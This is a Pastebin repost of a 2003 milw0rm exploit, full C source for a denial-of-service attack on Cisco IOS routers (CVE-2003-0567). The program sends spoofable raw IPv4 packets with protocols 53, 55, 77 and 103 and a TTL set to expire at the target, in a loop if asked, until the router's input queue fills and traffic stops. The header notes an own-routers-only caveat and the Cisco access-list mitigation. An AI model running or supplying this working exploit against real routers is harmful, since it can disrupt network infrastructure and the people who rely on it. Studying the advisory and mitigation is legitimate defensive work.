Advertisement
FlyFar

Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service - CVE-2003-0567

Feb 5th, 2024
870
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.64 KB | Cybersecurity | 0 0
  1. /*******************************************************/
  2. /* cisco-bug-44020.c - Copyright by Martin Kluge (martin@elxsi.de) */
  3. /*                                                                                            */
  4. /* Feel free to modify this code as you like, as long as you include */
  5. /* the above copyright statement.                                               */
  6. /*                                                                                            */
  7. /* Please use this code only to check your OWN cisco routers.         */
  8. /*                                                                                            */
  9. /*                                                                                            */
  10. /* This exploit uses the bug in recent IOS versions to stop router    */
  11. /* from processing traffic once the input queue is full.                    */
  12. /*                                                                                            */
  13. /*                                                                                            */
  14. /* Use access control lists as described in the CISCO advisory to     */
  15. /* protect your cisco routers:                                                       */
  16. /*                                                                                            */
  17. /* access-list 101 deny 53 any any                                              */
  18. /* access-list 101 deny 55 any any                                              */
  19. /* access-list 101 deny 77 any any                                              */
  20. /* access-list 101 deny 103 any any                                            */
  21. /*                                                                                            */
  22. /* This code was only tested on linux, no warranty is or will be        */
  23. /*                                                                                            */
  24. /* Usage: ./cisco-bug-44020 <src ip> <dst ip> <hops> <number>  */
  25. /* Source IP: Your source IP (or a spoofed source IP)                    */
  26. /* Destination IP: The IP of the vulnerable cisco router                  */
  27. /* Hops: The number of hops between you and the router,             */
  28. /* the time to live (ttl) should be 0 when the packet                      */
  29. /* is received by the cisco router.                                                 */
  30. /* Number: Number of packets to send (0 = loop)                         */
  31. /* provided.                                                                              */
  32. /*******************************************************/
  33.  
  34. #include <stdio.h>
  35. #include <stdlib.h>
  36. #include <string.h>
  37. #include <unistd.h>
  38.  
  39. #include <arpa/inet.h>
  40. #include <netinet/in.h>
  41.  
  42. #include <sys/time.h>
  43. #include <sys/types.h>
  44. #include <sys/socket.h>
  45.  
  46. #define DEBUG
  47.  
  48. #ifndef IPPROTO_RAW
  49. #define IPPROTO_RAW 0
  50. #endif
  51.  
  52. /* IPv4 header */
  53. struct ipv4_pkt_header {
  54. unsigned int ipvhl:8; /* Version + Header length */
  55. unsigned int type_service:8; /* TOS(Type of Service) field */
  56. unsigned short packet_len; /* Header+Payload length */
  57. unsigned short ident; /* Identification field */
  58. unsigned short fragment; /* Fragment Offset field */
  59. unsigned int time_live:8; /* TTL(Time to Live) field */
  60. unsigned int protocol:8; /* Protocol field */
  61. unsigned short sum; /* Checksum field */
  62. struct in_addr src_ip; /* Source IP */
  63. struct in_addr dst_ip; /* Destination IP */
  64. };
  65.  
  66.  
  67. char proto[] = {53,55,77,103};
  68.  
  69.  
  70. /* Prototypes */
  71. int in_cksum (unsigned short *, int, int);
  72.  
  73.  
  74. /* Main function */
  75. int main (int argc, char *argv[]) {
  76. struct ipv4_pkt_header ipv4_hdr;
  77. struct sockaddr_in sin;
  78. struct timeval seed;
  79.  
  80. unsigned long src_ip, dst_ip;
  81. int fd, hops, count, bytes;
  82. int len=0, i=0, n=0, loop=0;
  83.  
  84. unsigned char *buf;
  85.  
  86. /* Check command line args */
  87. if(argc != 5) {
  88. fprintf(stderr, "Usage: %s <src ip> <dst ip> <hops> <number>\n\n", argv[0]);
  89. return(EXIT_FAILURE);
  90. }
  91.  
  92. src_ip = inet_addr(argv[1]);
  93. dst_ip = inet_addr(argv[2]);
  94. hops = atoi(argv[3]);
  95. count = atoi(argv[4]);
  96.  
  97. if(count == 0) { loop=1; count=1; }
  98.  
  99. #ifdef DEBUG
  100. printf("DEBUG: Hops: %i\n", hops);
  101. #endif
  102.  
  103. /* Open a raw socket */
  104. if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
  105. fprintf(stderr, "Error: Cannot open raw socket.\n");
  106. return(EXIT_FAILURE);
  107. }
  108.  
  109. /* Build the IPv4 header */
  110. ipv4_hdr.ipvhl = ((4 << 4) | 0x0f) & (5 | 0xf0); /* :) */
  111. ipv4_hdr.type_service = 0x10;
  112.  
  113. #ifdef OSTYPE_BSD
  114. ipv4_hdr.packet_len = 0x14 + len;
  115. ipv4_hdr.fragment = 0x4000;
  116. #else
  117. ipv4_hdr.packet_len = htons(0x14 + len);
  118. ipv4_hdr.fragment = htons(0x4000);
  119. #endif
  120.  
  121. ipv4_hdr.time_live = hops;
  122. ipv4_hdr.src_ip.s_addr = src_ip;
  123. ipv4_hdr.dst_ip.s_addr = dst_ip;
  124.  
  125. while(n < count) {
  126. /* Seed the random generator */
  127. if(gettimeofday(&seed, NULL) == -1) {
  128. fprintf(stderr, "Error: Cannot seed the random generator.\n");
  129. return(EXIT_FAILURE);
  130. }
  131.  
  132. srandom((unsigned int) (seed.tv_sec ^ seed.tv_usec));
  133.  
  134. ipv4_hdr.protocol = proto[random() % 0x4];
  135.  
  136. #ifdef DEBUG
  137. printf("DEBUG: Protocol: %i\n", ipv4_hdr.protocol);
  138. #endif
  139.  
  140. ipv4_hdr.ident = htons(random() % 0x7fff);
  141.  
  142. /* Calculate checksum */
  143. ipv4_hdr.sum = 0x0000;
  144. ipv4_hdr.sum = in_cksum((unsigned short *) &ipv4_hdr, 0x14 + len, 0);
  145.  
  146. #ifdef DEBUG
  147. printf("DEBUG: Checksum: %i\n", ipv4_hdr.sum);
  148. #endif
  149.  
  150. buf = malloc(0x14 + len);
  151. memset(buf, '\0', 0x14 + len);
  152.  
  153. memcpy((unsigned char *) buf, (unsigned char *) &ipv4_hdr,
  154. 0x14 + len);
  155.  
  156. #ifdef DEBUG
  157. printf("DEBUG: ");
  158. for(i=0; i < 0x14 + len; i++)
  159. printf(" %02x", buf[i]);
  160. printf("\n");
  161. #endif
  162.  
  163.  
  164. memset(&sin, '\0', sizeof(struct sockaddr_in));
  165. sin.sin_family = AF_INET;
  166. sin.sin_addr.s_addr = dst_ip;
  167.  
  168. bytes = sendto(fd, buf, 0x14 + len, 0, (struct sockaddr *) &sin,
  169. sizeof(struct sockaddr));
  170.  
  171. #ifdef DEBUG
  172. printf("DEBUG: Wrote %i bytes.\n", bytes);
  173. #endif
  174.  
  175. if(loop != 1) n++;
  176.  
  177. free(buf);
  178. }
  179.  
  180. close(fd);
  181. return(EXIT_SUCCESS);
  182. }
  183.  
  184.  
  185. int in_cksum(unsigned short *addr, int len, int csum) {
  186. register int sum = csum;
  187. unsigned short answer = 0;
  188. register unsigned short *w = addr;
  189. register int nleft = len;
  190.  
  191. /*
  192. * Our algorithm is simple, using a 32 bit accumulator (sum), we add
  193. * sequential 16 bit words to it, and at the end, fold back all the
  194. * carry bits from the top 16 bits into the lower 16 bits.
  195. */
  196. while (nleft > 1) {
  197. sum += *w++;
  198. nleft -= 2;
  199. }
  200.  
  201. /* mop up an odd byte, if necessary */
  202. if (nleft == 1) {
  203. sum += htons(*(unsigned char *)w<<8);
  204. }
  205. /* add back carry outs from top 16 bits to low 16 bits */
  206. sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
  207. sum += (sum >> 16); /* add carry */
  208. answer = ~sum; /* truncate to 16 bits */
  209. return(answer);
  210. }
  211.  
  212.  
  213. // milw0rm.com [2003-07-21]
  214.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement